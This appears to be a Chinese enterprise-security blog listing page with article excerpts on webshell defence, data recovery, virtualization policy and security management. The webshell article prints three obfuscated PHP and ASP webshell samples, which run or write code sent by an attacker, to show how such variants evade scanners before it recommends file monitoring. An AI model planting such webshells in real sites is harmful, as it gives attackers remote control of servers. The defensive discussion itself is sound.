企业安全

  • 第三方组件安全企业安全分享!

    木桶能盛多少水取决于最短的那块板有多长,我实在找不出比这更形象的比喻来形容应用程序安全。

    企业安全 2020年4月27日
  • 邪恶女仆攻击企业安全分享!

    邪恶女仆攻击是指针对已经关闭的无人看管的计算设备的攻击。邪恶女仆攻击的特点是,在设备持有者不知情的情况下,攻击者可以多次亲手接触目标设备。

    企业安全 2020年4月27日
  • 经过网络渗透测试 为什么企业仍然遭受攻击?企业安全分享!

    企业保护网络的方式仍然有一些基础问题,它们源于企业评估安全状态的方式。此外,这也解释了,为什么一些组织能够通过渗透测试,却仍然遭受攻击。     造成问题的根源是,构成企业安全性的两个主要基础组件相互之间没有任何直接关系——入侵防御系统(IDS)和渗透测试。事实上,这两种方法都无法真正改进网络安全性。它们的实施周期通常是这样:一个单位花钱请一个安全公司对网络执行一次全面渗透测试。然后,安全顾问会发布一个报告,全面说明漏洞情况,以及不采取必要措施的严重后果。     迫于时间压力,这个单位会投入资金解决这个问题,匆匆部署一个基于签名的IDS,用于清除发现的漏洞。然后,再执行一次测试,这时新部署的IDS就会闪亮登场,表示它已经处理了所有安全漏洞。这样对方就说已经把安全工作做完了。但是实际上并不是这回事。一个月之后,有人发现有一个关键服务器在不停地泄露数据。运气好的话,IDS会发现这个问题并发出警报(及许多相关报告)。运气不好的话,信用卡中心报告说,您的网上商店有信用欺诈行为,因此将您踢出局。   自动化网络渗透测试没用   真正的攻击行为通常比自动化测试的“自我破坏”高明许多。在大多数时候,攻击者并不会利用2009年前就已经修复的互联网信息服务器漏洞——因为现在的自动化测试工具已经覆盖了这些漏洞。     我们处于一种尴尬状态:症状和治疗方法都有,但是病人仍然在生病;Web服务器仍然受到攻击。显然,我们需要一种新方法。企业需要寻找一些防御黑客攻击技术的工具和技术,而不能依赖于自动化渗透测试发现的漏洞或人造环境。     有许多供应商推出了防御最复杂多样的攻击(有时候称为高级持久威胁或APT),如Check Point、FireEye和Juniper。这些工具似乎都宣称比传统安全控件更擅长基于智能和声誉判断流量的好坏。然而,除非这些方法带有可靠的意外管理功能,否则它们只会成为下一个最昂贵但无实质作用的网络设备,历史仍在重复。 

    企业安全 2020年4月27日
  • 如何保障企业数据安全企业安全分享!

    数据安全非常重要,作为网络维护人员会经常遇到相似的问题。我就经常去客户那里帮客户拯救丢失的数据。数据对客户非常重要,那么我们如何防止数据的丢失呢? 1在我们使用硬盘的时候,尤其是读取数据的时候,一定不能断电。 2硬盘最怕震,比如笔记本啊,或者移动硬盘,一定要轻拿轻放。 3要定期备份重要数据,有条件的话最好像银行那样做异地备份,这样最安全。 4要谨慎使用一些对磁盘操作的工具软件,比如NDD,HDDREG等等。 5尽量不要把重要的数据存放在邮箱中。 6不要把重要数据存在C盘里。 7 要及时安装系统补丁,防止木马来窃取数据。 下面我们说一下数据恢复和数据修复的问题。 我们先看一下如何给客户做数据恢复 我们要先和与客户交流,询问数据丢失的原因,比如是误操作还是硬盘发生故障了,以及发生故障后,用户做了那些操作也是非常重要的。 然后,分析问题的原因,这里主要分2类, 一种情况是系统崩溃了,重要的数据保存在C盘或者在C盘的桌面上,因为电脑无法正常开机,所以无法找到数据。 还有就是客户单位的电脑的C盘安装了重要的软件或者有其他的重要的文件的时候,这时候就不能简单的用重装系统的方法了,怎么解决这个问题呢?这里推荐用WINPE,把重要文件找出来,拷贝出来即可。 另外一种情况是硬盘的问题,主要包括突然硬电脑不识别硬盘了,或者是某个分区读不出数据了,或者是误删除文件了。 如果是电脑无法识别硬盘,请查看连接是否正常,或者进BIOS查看。 如果硬盘有声音,请找专业的硬盘恢复数据的厂家。 如果是硬盘电脑能识别或者误操作文件了,这样的话我们可以使用一些软件来恢复,比如 DISKMAN,EASY RECOVERY,以及FINAL DATA等等。 我们再看另外一种情况,硬盘能找到,分区也能读取,分区里的文件也能找到,但是文件打不开,比如WORD,EXCEL等,这时候问题就简单多了,我们要做的是数据修复,常用的软件如下: OFFICE 文件修复软件 MP3文件修复软件 音频视频修复软件 PDF修复软件 这些软件可以去网上找,有很多。 我们再谈一下密码的问题 有的时候因为各种原因,造成密码忘记了,怎么办呢? 可以找一些密码去除软件或者破解密码软件,网上有很多。 最后补充2点 1如果是NTFS格式的话,不要贸然的重装系统,因为如果有的文件是加密的,即使重装系统也无法读取。 2 如果是某些盘符丢失了,可以去磁盘管理里边去添加。  

    企业安全 2020年4月27日
  • 企业web安全之webshell防控浅谈企业安全分享!

    根据我片面的工作经验分析,目前企业遇到的入侵还是以web为入口的居多。其中webshell依然是常见的提权及渗透通道。      下面我仅用自己的一点片面经验谈谈如何针对webshell做出安全防控工作。      通常情况下,我们会依靠各种脚本和工具来查杀webshell,但是随着webshell的变异加密等多样化的变形方式的公布,传统的关键字对比查杀模式就出来了,大量误报以及漏报的问题。       例如如下现在流行的几款变异小马:   exp1:   <script language=php> $_1=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116); @$_1(chr(64).chr(101).chr(118).chr(97).chr(108).chr(40). chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91). chr(97).chr(93).chr(41).chr(59)); </script>   exp2:   <%On Error Resume Next Set f = Server.CreateObject("ADODB.Stream") f.Type = 2 f.mode = 3 f.Charset = "gb2312" f.open f.WriteText "<"&Chr("37")&StrReverse(Request("cq3h63"))&Chr("37")&">" f.SaveToFile Replace(Server.MapPath(Request("cq3h61")), ".", "~1")%>   exp3:     <%On Error Resume Next {1 = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source= " & Replace(Server.MapPath(Request("p1565pe51")), ".", "~1") set {a = Server.Createobject("ad"&"ox"&"."&"cata"&"log") {a.create {1 Set { = Server.Createobject("ad"&"odb"&"."&"conne"&"ction") {.open {1 Set {s=server.createobject("ad"&"odb.rec"&"ord"&"set") {s.Open "create table t1(a text)", {, 1, 1 {s.Open "insert into t1(a) values ('<"&Chr("3"&"7") & StrReverse(Request("p1565pe53")) & Chr("3"&"7") & ">')", {, 1, 1%>        这些webshell如果利用现有的脚本和工具大多会产生漏报的现象,所以个人感觉与其扫描查找webshell不如做好监控措施,把我目前所用到的一些小经验分享下。 一:文件改动对比通知。   1:文件MD5效验。   2:文件大小效验。 二:文件数量监控。   1:对文件的数量进行监控,定时遍历目录对文件出现新建和删除的情况能做到及时的通知。 这些要说一下细节。监控文件个数这方面一定要做好优化工作,不然如果做了邮件通知那么监控人员一定会被轰炸死.具体的优化也很简单:对上传目录、缓存目录、删除脚本执行权限,修复掉各种解析漏洞。这样类似这些上传的目录完全可以放心的不用加入监控目录。所以安全工作就是一环扣一环。 三:定期的邮件通知。 这个不需要太多解释,你做了监控自己看不到数据是白搭。 四:代码的SVN或本地存档备份。 这个很重要,安全和监控不是程序员,不可能了解程序员的每条语句和语法。在不确定代码是否被污染的情况下,差异对比的效果就很明显了。       这四点是我目前在工作中的心得,个人感觉随着webshell的日新月异与其努力做到查杀webshell不如做到及时监控webshell和可疑文件

    企业安全 2020年4月27日
  • 如何设置虚拟环境的网络安全策略?企业安全分享!

    虚拟化已经成为许多组织优化现有服务器与基础架构的重要工具,它有许多优点,但是组织的网络安全政策可能无法覆盖虚拟化环境。     网络安全政策是管理层制定的高层文档,目的是将管理层的指导策略和观念传达到员工。管理和业务过程的人负责组织和设计成功的安全政策。政策要突出管理层的阐述方式。网络安全政策必须阐述清楚谁负责安全性,需要在虚拟环境中保护什么,以及定义一个可接受的风险级别。网络虚拟化环境的安全政策必须解决下面这些关键方面:     • 授权与责任   • 复制、容错和故障恢复   • 宿主安全性   • 共享资源   • 备份   • 应急响应   • 培训     设置访问权限     授权关系到要确定谁负责设置宿主服务器及关联虚拟系统的访问权限。小型组织可能允许同一个人担任宿主服务器与虚拟服务器管理员。而在大型组织中,这些角色必须划分不同的角色,如宿主管理员、备份操作员、虚拟网络管理员和最终用户。由于虚拟化在大多数大型环境中发挥重要作用,因此必须记录环境中大部分甚至全部的活动日志。审计日志应该细化、保密并添加完整性控制。此外,政策还需要讨论检查和保存时间。     实现必要的复制、容错和故障恢复控制,必须清晰理解服务的依赖性。例如,如果有一个虚拟服务器出错,那么它应该要快速复制到其他位置。但是,如果有多个宿主服务器出错,那么应该如何规划这些系统及其虚拟化客户端的复制呢?虚拟化的主要优势是高可用性;所以网络安全政策应该明确规定的VMware、Hyper-V和XenServer的高可用性选项。如果政策包含这个方面,那么您可以部署一个全冗余设备,在发生事故时它的配置必须能够接管处理负载。     宿主安全性是一个重要部分     宿主安全性至关重要。物理系统与虚拟系统之间有一个明显的区别:虚拟系统实际上是一组文件,它们可能会被盗取、复制和篡改。而物理系统则完全不同。因为攻击者可能复制这些文件,所以必须仔细检查访问控制。此外,政策还必须防止恶意软件从一个虚拟系统传播到另一个虚拟系统。     共享资源是另一个重要问题。一个虚拟系统用户可能会访问物理系统的RAM、CPU和(甚至 )网络接口卡(NIC)。这样有可能从共享资源和网络分流器泄漏数据,也可能使用网络嗅探工具拦截通过物理NIC的流量。     同时,备份可能也是另一个需要特别注意的问题,虽然您已经备份了整个物理系统。由于虚拟化总是会通过备份宿主的硬盘实现大规模共享存储环境,所以现在数据会成为一个持续存储的文件。如果这个文件中一部分被破坏,那么就可能丢失所有虚拟系统。每一个虚拟系统可能都需要使用原生虚拟化复制技术进行备份。至少,网络安全政策必须有这方面的规定。     准备应急响应计划     虽然我们都希望永远不出现问题,但是现实中总会出现一些意外情况。在意外出现之前,一定要先准备好应急响应计划,处理任何可能出现的问题。这个计划必须覆盖虚拟环境。假设有一个这样的场景:FBI因为某个犯罪案件的原因封禁一个虚拟系统。如果相关部门带走了整个硬盘,那么共享磁盘中其他系统应该怎么处理?     千万不要忽视培训。您的政策必须规定员工可以做和不可以做的事情。此外,还要通过培训执行良好的安全实践方法。一个培训不当的员可能会无意识地将密码泄漏给黑客。如果不经过正确培训,那么员工通常不知道他们的操作或活动会对组织安全造成什么样的影响。安全链条中最薄弱的一个环节就是公司的员工。     企业的虚拟化环境网络安全政策必须考虑虚拟化可能对工作场所带来的变化。虚拟网络安全政策是很有必要的,因为现有的安全政策还远远不够,它们中有一些是在非虚拟化环境中制定的。     现代虚拟化政策必须包括技术与人员。政策的技术方面必须解决虚拟化环境的许多特殊性,并且加入审计、备份和宿主安全性。同时,政策的人员方面不仅要加入安全实践方法培训,也要让员工理解它们的行为将如何影响组织的安全性

    企业安全 2020年4月27日
  • 工控系统安全 不容忽视的安全领域企业安全分享!

    随着工业化与信息化进程的不断交叉融合,越来越多的信息技术应用到了工业领域。目前,超过80%的涉及国计民生的关键基础设施依靠工业控制系统来实现自动化作业。工业控制系统已经成为国家关键基础设施的重要组成部分,工业控制系统的安全关系到国家的战略安全。

    2020年4月27日
  • 保障企业网络安全的一些措施企业安全分享!

    随着计算机网络技术的不断发展,计算机网络的应用领域越来越宽泛,所以计算机网络的安全性也越来越重要。

    企业安全 2020年4月27日
  • BYOD与大数据:需重新设定“安全防线”企业安全分享!

    美国情报机构拥有非常完备的信息保全制度,但仍无法拦住斯诺登将机密文件拷贝至自己的设备,这与BYOD不无关系。在毫无准备的情况下,默许或者提倡员工自带设备进行办公时,用户会访问个人社交网络、下载喜好的App程序、浏览网页,而同一个设备还会访问企业内部的关键数据。因此,如果确实需要在自有终端上运营保密级别较高的数据和应用,那就需要对安全管理有预先的规划和部署,设置一定的门槛。

    企业安全 2020年4月27日
  • 信息安全体系建设注意事项企业安全分享!

    在前面的文章中,我们明确了信息安全三大体系的重要作用,现在应该考虑,如何进行三大体系建设,建设过程中又需要注意哪些事项?
    山东省软件评测中心根据多年经验,总结出在信息安全体系建设中需要注意的事项,希望能给大家带来帮助。
    (一)需要专业化的安全项目管理
    在进行信息安全体系建设时,伴随着建设过程中的信息安全项目的实施。信息安全项目需由专业的咨询监理机构提供全程的项目管理与质量控制,确保信息安全项目不偏离目标,高效、稳定的解决信息安全问题。
    信息安全项目的管理应遵循项目管理的九大领域:综合管理、范围管理、时间管理、成本管理、风险管理、人资管理、沟通管理、采购管理和质量管理。风险管理是项目管理的主要部分,其目的是追求积极活动的最大化和不利活动的最小化。在现代项目管理中,强调对项目目标的主动控制,以对项目实现过程中遭遇的风险和干扰因素可以预防作用,从而减少损失。由于信息安全项目一般会使目前的信息安全状态发生变化,从而带来新的威胁与风险,所以,如何降低信息安全项目引入的安全威胁,使风险达到企业可接受的程度,需要采取专业的信息安全风险管理。
    信息安全项目风险管理主要是针对项目过程中的技术风险、业务风险和管理风险、环境风险和流程风险等方面,在项目过程中进行充分的进行风险识别。
    信息安全项目的风险管理的内容包括在项目过程中的对象确立、风险评估、风险预案、审核实施、实施监控和沟通咨询六个方面的内容。对象确立、风险评估、风险预案和审核实施是信息安全风险管理的四个基本步骤,实施监控和沟通与咨询则贯穿于这四个基本步骤中,如图所示。
    图 风险管理内容和流程
    第一步骤是对象确立,根据项目中要保护系统的业务目标和特性,确定风险管理对象。第二步骤是风险评估,针对确立的风险管理对象所面临的风险进行识别、分析和评价。第三步骤是风险预案制定,依据风险分析的结果,制定项目过程中存在的风险,及风险的对策;依据风险评估的结果,选择和实施合适的安全措施。第四步骤是审核实施,包括审核和实施两部分:审核是指通过审查、测试、评审等手段,检验风险评估和风险预案是否满足信息系统的安全要求;实施是指机构的决策层依据审核的结果,做出实施决定,按照预案进行风险处置。当项目过程中系统的业务目标和特性发生变化或面临新的风险时,需要再次进入上述四个步骤,形成新的一次循环。因此,对象确立、风险评估、风险预案和审核实施构成了一个螺旋式上升的循环,使得项目中受保护系统在自身和环境的变化中能够不断应对新的安全需求和风险。
    监控与审查对上述四个步骤进行监控和审查。监控是监视和控制,一是监视和控制风险管理过程,即过程质量管理,以保证上述四个步骤的过程有效性;二是分析和平衡成本效益,即成本效益管理,以保证上述四个步骤的成本有效性。审查是跟踪受保护系统自身或所处环境的变化,以保证上述四个步骤的结果有效性。监控与审查依据对当前步骤的监控和审查结果,控制上述四个步骤的主循环,形成许多局部循环。也就是说,在当前步骤的监控和审查结果通过时,进入下一个步骤;否则,继续当前步骤或退到前面的适当步骤。由此,保证主循环中各步骤的有效性。
    沟通与咨询为上述四个步骤的相关人员提供沟通和咨询。沟通是为上述过程参与人员提供交流途径,以保持他们之间的协调一致,共同实现安全目标。咨询是为上述过程所有相关人员提供学习途径,以提高他们的风险意识和知识,配合实现安全目标。
    在信息安全项目中采用咨询式项目管理,可以保障信息安全项目按照既定目标实施,达到企业预期效果;可以降低信息安全项目实施过程给企业信息化带来的安全风险;可以有效解决项目拖期、沟通不畅、目标偏离、质量不可控和超预算等项目管理问题;确保使企业通过实施信息安全项目,切实提高信息安全防御水平。
    (二)需要定期的安全检测与评估
    在进行信息安全体系建设时需定期的对信息安全状况进行安全检测与风险评估,识别当前面临的威胁与风险,指导下一步建设的注意事项。
    信息安全风险评估、信息安全等级保护测评和信息安全分级保护测评是项目交付检测阶段常见的风险识别手段。
    单位建立信息系统的目的在于信息系统能够为企业提供价值,大大提高企业的执行效率。然而,信息系统的引进带来了价值,也带来了信息安全风险。因此,为了做好信息安全治理,企业需要了解自身的信息安全风险等级,从而有针对性地采取防护措施。
    信息安全风险评估是对企业的信息安全现状进行理性分析的定制服务,包括资产识别、威胁识别、脆弱性识别、安全措施识别与确认、风险分析、风险处理等过程。在风险评估实施过程中,企业应根据自身安全需要,按照风险评估流程定义划分信息安全风险等级,有重点的对信息资产和威胁脆弱性进行差异化保护,从而进行风险处理,使企业信息安全风险等级降低到可接受水平,提高信息化建设投资效益比。
    信息安全风险评估需要定期进行,并应做到常态化开展。
    在用户知悉自身系统安全脆弱性的情况下,用户可以进行信息安全风险评估。然而,目前大部分企业或政府机关,他们并不了解如何衡量自身的信息安全风险等级。根据国家信息安全战略和规划思想,我国实习信息安全等级保护和分级保护制度,并督促各级单位开展相应等级的安全建设和管理,做好信息系统定级备案、整改和监督检查工作。其中,信息安全等级保护主要适用于非涉及国家秘密(简称“非密”)的信息系统安全防护建设要求,信息安全分级保护主要适用于涉及国家秘密(简称“涉密”)的信息系统安全防护建设要求。
    信息系统安全等级保护测评是验证非密信息系统是否满足相应安全保护等级建设要求的评估过程。信息安全等级保护要求不同安全等级的信息系统应具有不同的安全保护能力,一方面通过在安全技术和安全管理上选用与安全等级相适应的安全控制来实现;另一方面分布在信息系统中的安全技术和安全管理上不同的安全控制,通过连接、交互、依赖、协调、协同等相互关联关系,共同作用于信息系统的安全功能,使信息系统的整体安全功能与信息系统的结构以及安全控制间、层面间和区域间的相互关联关系密切相关。
    根据等级保护测评要求,第三级信息系统每年至少进行一次等级测评,第四级信息系统每半年至少进行一次等级测评,第五级信息系统依据特殊安全需求进行等级测评。
    信息系统安全分级保护测评是验证涉密信息系统是否满足相应分级保护建设要求的评估过程。因为涉及分级保护建设要求的规范和资料均为涉密资料,因此分级保护测评工作专业性更强,目前分级保护测评需要专业的测评机构给予技术支持。
    根据分级保护测评要求,秘密级、机密级信息系统每两年至少进行一次分级保护测评,绝密级信息系统每年至少进行一次分级保护测评。
    (三)需要健全的运维保障机制
    在进行信息安全体系建设时,需要将信息安全作为一个整体,需要把过程中的有关各层次的安全产品、分支机构、运营网络、管理维护制度等纳入一个紧密的统一信息安全运维体系中,才能有效地保障企业的网络和信息安全。
    很多单位企业尝试通过部署“最佳”安全产品来保护自己,比如防病毒网关、防火墙、入侵防护系统、VPN、访问控制、身份认证等。在这种极度复杂的情况下,需要的是一个集成的解决方案,使得企业能够收集、关联和管理来自异类源的大量安全事件,实时监控和做出响应,需要的是能够轻松适应环境增长和变化的管理体系,需要的就是企业完整的信息安全运维体系。
    信息安全运维体系的内容包括安全运维监控中心、安全运维告警中心、安全运维事件响应中心、安全运维审核评估中心、信息资产管理中心五个方面的内容。并且,这五个方面的内容也可以作为信息安全运维体系建立的五个步骤。同时,利用持续改进模型方法,把策划、实施、检查、改进(PDCA)贯穿于这五个基本步骤中。
    第一步骤是建立安全运维监控中心,基于关键业务点面向业务系统可用性和业务连续性进行合理布控和监测,以关键绩效指标指导和考核信息系统运行质量和运维管理工作的实施和执行,帮助用户建立全面覆盖信息系统的监测中心,并对各类事件做出快速、准确的定位和展现。实现对信息系统运行动态的快速掌握,以及运行维护管理过程中的事前预警、事发时快速定位。
    第二步骤是建立安全运维告警中心,基于规则配置和自动关联,实现对监控采集、同构、归并的信息的智能关联判别,并综合的展现信息系统中发生的预警和告警事件,帮助运维管理人员快速定位、排查问题所在。同时,告警中心提供多种告警响应方式,内置与事件响应中心的工单和预案处理接口,可依据事件关联和响应规则的定义,触发相应的预案处理,实现运维管理过程中突发事件和问题处理的自动化和智能化。
    第三步骤是建立安全运维事件响应中心,借鉴并融合了ITIL(信息系统基础设施库)/ITSM(IT服务管理)的先进管理规范和最佳实践指南,借助工作流模型参考等标准,开发图形化、可配置的工作流程管理系统,将运维管理工作以任务和工作单传递的方式,通过科学的、符合用户运维管理规范的工作流程进行处置,在处理过程中实现电子化的自动流转,无需人工干预,缩短了流程周期,减少人工错误,并实现对事件、问题处理过程中的各个环节的追踪、监督和审计。
    第四步骤是建立安全运维审核评估中心,该中心提供对信息系统运行质量、服务水平、运维管理工作绩效的综合评估、考核、审计管理功能。
    第五步骤以信息资产管理为核心,IT资产管理是全面实现信息系统运行维护管理的基础,提供的丰富的IT资产信息属性维护和备案管理,以及对业务应用系统的备案和配置管理。基于关键业务点配置关键业务的基础设施关联,通过资产对象信息配置丰富业务应用系统的运行维护内容,实现各类IT基础设施与用户关键业务的有机结合,以及全面的综合监控
     

    企业安全 2020年4月27日
  • 建设工作要做好 安全体系很重要企业安全分享!

    在前面的文章中(http://www.Dengb.com/Article/201307/224582.html),我们了解了信息安全策略的重要性以及如何做好信息安全策略,本文我们介绍信息安全建设过程中另外一项重要工作——三大体系:组织管控体系、技术管控体系和运营管控体系。 山东省软件评测中心根据多年信息安全建设经验,简单总结以上三大体系,希望能给大家带来帮助。下图为信息安全体系框架总体结构图。 信息安全体系框架总体结构 从上图可以看出,信息安全体系主要是由安全技术体系、安全组织与管理体系以及运行保障体系三部分共同构成的。 在前面的文章中我们了解到,安全策略是指导。安全策略与安全技术体系、安全组织和管理体系以及运行保障体系这三大体系之间的关系也是相互作用的。三大体系是在安全策略的指导下构建的,主要是要将安全策略中制定的各个要素转化成为可行的技术实现方法和管理、运行保障手段,全面实现安全策略中所制定的目标。 (一)组织管控体系 组织管控体系是安全技术体系真正有效发挥保护作用的重要保障,组织管控体系的设计立足于总体安全策略,并与安全技术体系相互配合,增强技术防护体系的效率和效果,同时也弥补当前技术无法完全解决的安全缺陷。 技术和管理是相互结合的,一方面,安全防护技术措施需要安全管理措施来加强,另一方面技术也是对管理措施贯彻执行的监督手段。 组织管控体系由若干信息安全管理类组成,每项信息安全管理类可分解为多个安全目标和安全控制。每个安全目标都有若干安全控制与其相对应,这些安全控制是为了达成相应安全目标的管理工作和要求。信息安全管理体系一共包括了12项管理类:安全策略与制度、安全风险管理、人员和组织安全管理、环境和设备安全管理、网络和通信安全管理、主机和系统安全管理、应用和业务安全管理、数据安全和加密管理、项目工程安全管理、运行和维护安全管理、业务连续性管理管理、合规性(符合性)管理。 (二)技术管控体系 技术管控体系是整个信息安全体系框架的基础,包括了安全基础设施平台、安全应用系统平台和安全综合管理平台这三个部分,以统一的信息安全基础设施平台为支撑,以统一的安全系统应用平台为辅助,在统一的综合安全管理平台管理下的技术保障体系框架。 安全基础设施平台是以安全策略为指导,从物理和通信安全防护、网络安全防护、主机系统安全防护、应用安全防护等多个层次出发,立足于现有的成熟安全技术和安全机制,建立起的一个各个部分相互协同的完整的安全技术防护体系。 安全应用系统平台处理安全基础设施与应用信息系统之间的关联和集成问题,应用信息系统通过使用安全基础设施平台所提供的各类安全服务,提升自身的安全等级,以更加安全的方式,提供业务服务和内部信息管理服务。 安全综合管理平台的管理范围尽可能地涵盖安全技术体系中涉及的各种安全机制与安全设备,对这些安全机制和安全设备进行统一的管理和控制,负责管理和维护安全策略,配置管理相应的安全机制,确保这些安全技术与设施能够按照设计的要求协同运作,可靠运行。它在传统的信息系统应用体系与各类安全技术、安全产品、安全防御措施等安全手段之间搭起桥梁,使得各类安全手段能与现有的信息系统应用体系紧密的结合实现无缝连接,促成信息系统安全与信息系统应用的真正的一体化,使得传统的信息系统应用体系逐步过渡到安全的信息系统应用体系。 统一的安全管理平台有助于各种安全管理技术手段的相互补充和有效发挥,也便于从系统整体的角度来进行安全的监控和管理,从而提高安全管理工作的效率,使人为的安全管理活动参与量大幅下降。 技术和管理是相互结合的,一方面,安全防护技术措施需要安全管理措施来加强,另一方面技术也是对管理措施贯彻执行的监督手段。 (三)运营管控体系 运营管控体系由安全技术和安全管理紧密结合的内容所组成,包括了系统可靠性设计、系统数据的备份计划、安全事件的应急响应计划、安全审计、灾难恢复计划等,运行保障体系对于组织信息化的可持续性运营提供了重要的保障手段  

    企业安全 2020年4月27日
  • 掌握信息安全建设方法 了解信息安全策略企业安全分享!

    信息安全建设是一个非常细致、重要的工作。做好信息安全建设工作,首先需要对组织信息化发展的历史情况进行深入和全面的调研,知道家底、掌握情况,针对信息安全的主要内容进行整体的发展规划工作。 在前面的文章中,我们了解到信息安全建设的目的,本文我们介绍信息安全建设的引领者——信息安全策略。 信息安全策略,是一个有效信息安全项目的基础。从信息安全领域中发生的事件来看,信息安全策略的核心地位变得越来越明显。例如,没有安全策略,系统管理员将不能安全的安装防火墙。策略规定了所允许的访问控制、协议以及怎样记录与安全有关的事件。尽管信息安全策略是廉价的实施控制方式,但它们也是最难实施的。策略花费的仅仅是创建、批准、交流所用的时间和精力,以及员工把策略整合形成日常行为规范所用的时间和精力。即使是雇佣外部顾问来辅助制定策略,与其它控制方法(特别是技术控制)相比,其花费也是较小的。策略的制定需要达成下述目标:减少风险,遵从法律和规则,确保组织运作的连续性、信息完整性和机密性。 信息安全策略应主要依靠组织所处理和使用的信息特性推动制定。组织为高层主管、董事会成员、战略伙伴以及员工提供了内部信息系统,对信息系统中信息特性的理解,能为策略制定提供有用的依据。应当重视对信息系统了解深刻的员工,所提出的组织当前信息的主要特性,具体包括:什么信息是敏感的、什么信息是有价值的以及什么信息是关键的。 在制定一整套信息安全策略时,应当参考一份近期的风险评估或信息审计,以便清楚了解组织当前的信息安全需求。对曾出现的安全事件的总结,也是一份有价值的资料。也需要召开相关人员会议,比如首席信息官、物理安全主管、信息安全主管、内部审计主管和人力资源主管等。 为了确定哪些部分需要进一步注意,应收集组织当前所有相关的策略文件,例如计算机操作策略、应用系统开发策略、人力资源策略、物理安全策略。也可以参考国际标准、行业标准来获得指导。资料收集阶段的工作非常重要,很多时候因为工作量和实施难度被简化操作。资料收集不全,调研不够充分会导致新建的信息安全策略无法与组织的真正需求一致。也无法确保策略中的要求与管理目标相一致。如果提出一套与组织文化明显不一致的策略,更是一件很尴尬的事情。 在制定策略之前,对现状进行彻底调研的另一个作用是要弄清楚内部信息系统体系结构。信息安全策略应当与已有的信息系统结构相一致,并对其完全支持。这一点不是针对信息安全体系结构,而是针对信息系统体系结构。信息安全策略一般在信息系统体系结构确立以后制定,以保障信息安全体系实施、运行。例如,互联网访问控制策略可使安全体系结构具体化,也有利于选择和实施恰当的防火墙产品。 收集完上面所提到的材料后,也就是调研阶段完成后,开始根据前期的调研资料制定信息安全策略文档初稿。初稿完成后,应当寻找直接相关人员对其进行小范围的评审。对反馈意见进行修改后,逐渐的扩大评审的范围。当所有的支持部门做出修改后,交由信息安全管理委员会评审。 信息安全策略的制定过程有很高的政策性和个性,反复的评审过程能够让策略更加清晰、简洁,更容易落地,为此在评审的过程中需要调动参与积极性,而不是抵触。 评审过程的最后一步一般由总经理、总裁、首席执行官签名。在人员合同中应当表明能予遵守并且这是继续雇佣的条件。也应当发放到内部服务器、网页以及一些宣传版面上的显眼位置,并附有高层管理者的签名,以表明信息安全策略文档得到高层领导强有力的支持。如果让首席执行官签名不现实,由首席信息官签名也可以。要注意仅有信息安全部门主管或同级的部门主管签名,一般不足以表明高层管理者的同意和支持。虽然获得高层管理者的同意很难实施,但经验表明,高层的支持对策略的实施落地是非常重要的。  一般来说,在信息安全策略文件评审过程中,会得到组织内部各方多次评审和修订,其中最为重要的是信息安全管理委员会。信息安全委员会一般由信息部门人员组成,参与者一般包括以下部门的成员:信息安全、内部审计、物理安全、信息系统、人力资源、法律、财政和会计部。这样一个委员会本质上是监督信息安全部门的工作,负责筛选提炼已提交的策略,以便在整个组织内更好的实施落地。如果组织内还没有信息安全管理委员会,在制定信息安全策略的时候正是建立管理委员会的好时机,或由组织内已存在的同职能部门担任职责。 虽然制定了新的安全策略,还必须有一个适当的实施过程,如果这些策略不能得到实施,将起不到任何作用,不能得到执行的策略,可能比完全没有策略更糟糕,因为这样会教会员工作假和质疑组织内部执行力,这也可能麻痹管理者认为信息安全为题已经处理虽然现实是另外一回事。  管理层常以为员工行为当然以组织利益为重,这是一个欠考虑的想法。虽然策略不可能影响员工的个人价值观,但管理层可以运用策略给员工提供机会,引导他们和组织的利益一致。策略告诉员工组织对他们的期望是什么。 新策略发布前,应在内部信息技术部门或审计部门内讨论如果具体实施。新策略的执行可能会遇到多样化的问题。可以通过绩效评估和相应奖惩制度来保证策略的执行有效性。发现和惩罚违反策略的员工并不是目的。如果大量的人都不遵守,这就表明策略和相关的意识提升是无效的。在此情形下,需要寻找更有效的方式实施,或修改策略,以便更好的反映组织文化。 以上是山东省软件评测中心多年工作总结,希望能给大家带来帮助,不足之处,还望指正。  

    企业安全 2020年4月27日